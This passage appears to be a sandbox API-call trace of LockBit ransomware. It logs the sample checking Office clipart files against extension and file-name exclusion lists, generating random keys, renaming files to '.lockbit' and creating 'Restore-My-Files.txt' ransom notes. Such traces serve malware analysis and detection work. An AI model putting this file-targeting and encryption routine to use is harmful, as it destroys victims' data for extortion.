[0109.194] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.194] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00648_.WMF") returned 1 [0109.195] lstrcmpiW (lpString1="ntldr", lpString2="BL00648_.WMF") returned 1 [0109.195] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00648_.WMF") returned 1 [0109.195] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00648_.WMF") returned 1 [0109.195] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00648_.WMF") returned -1 [0109.195] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00648_.WMF") returned 1 [0109.195] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00648_.WMF") returned 1 [0109.195] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.195] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned=".WMF" [0109.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.195] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.195] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.196] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.196] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.lockbit") returned 72 [0109.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.197] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.197] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.197] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11500) returned 1 [0109.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.198] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.208] malloc (_Size=0xa6) returned 0x77d800 [0109.208] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.208] free (_Block=0x77d800) [0109.208] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.208] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.209] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeba4c700, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeba4c700, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00921_.WMF", cAlternateFileName="")) returned 1 [0109.209] lstrcmpiW (lpString1=".", lpString2="BL00921_.WMF") returned -1 [0109.209] lstrcmpiW (lpString1="..", lpString2="BL00921_.WMF") returned -1 [0109.209] PathFindExtensionW (pszPath="BL00921_.WMF") returned=".WMF" [0109.209] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.209] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.210] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00921_.WMF") returned 1 [0109.210] lstrcmpiW (lpString1="ntldr", lpString2="BL00921_.WMF") returned 1 [0109.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00921_.WMF") returned 1 [0109.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00921_.WMF") returned 1 [0109.210] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00921_.WMF") returned -1 [0109.210] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00921_.WMF") returned 1 [0109.210] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00921_.WMF") returned 1 [0109.211] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.211] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned=".WMF" [0109.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.211] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.211] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.211] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.lockbit") returned 72 [0109.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.213] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.213] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.213] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4408) returned 1 [0109.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.214] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.218] malloc (_Size=0xa6) returned 0x77d800 [0109.218] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.220] free (_Block=0x77d800) [0109.220] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.220] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.220] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74832900, ftCreationTime.dwHighDateTime=0x1bd4bf7, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74832900, ftLastWriteTime.dwHighDateTime=0x1bd4bf7, nFileSizeHigh=0x0, nFileSizeLow=0x1870, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00923_.WMF", cAlternateFileName="")) returned 1 [0109.220] lstrcmpiW (lpString1=".", lpString2="BL00923_.WMF") returned -1 [0109.220] lstrcmpiW (lpString1="..", lpString2="BL00923_.WMF") returned -1 [0109.220] PathFindExtensionW (pszPath="BL00923_.WMF") returned=".WMF" [0109.220] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.220] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.220] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.220] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.220] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.220] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.221] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.221] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00923_.WMF") returned 1 [0109.222] lstrcmpiW (lpString1="ntldr", lpString2="BL00923_.WMF") returned 1 [0109.222] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00923_.WMF") returned 1 [0109.222] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00923_.WMF") returned 1 [0109.222] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00923_.WMF") returned -1 [0109.222] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00923_.WMF") returned 1 [0109.222] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00923_.WMF") returned 1 [0109.222] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.222] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned=".WMF" [0109.222] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.222] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.222] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.223] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.223] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.lockbit") returned 72 [0109.223] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.224] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.224] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.224] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6256) returned 1 [0109.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.225] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.lockbit", 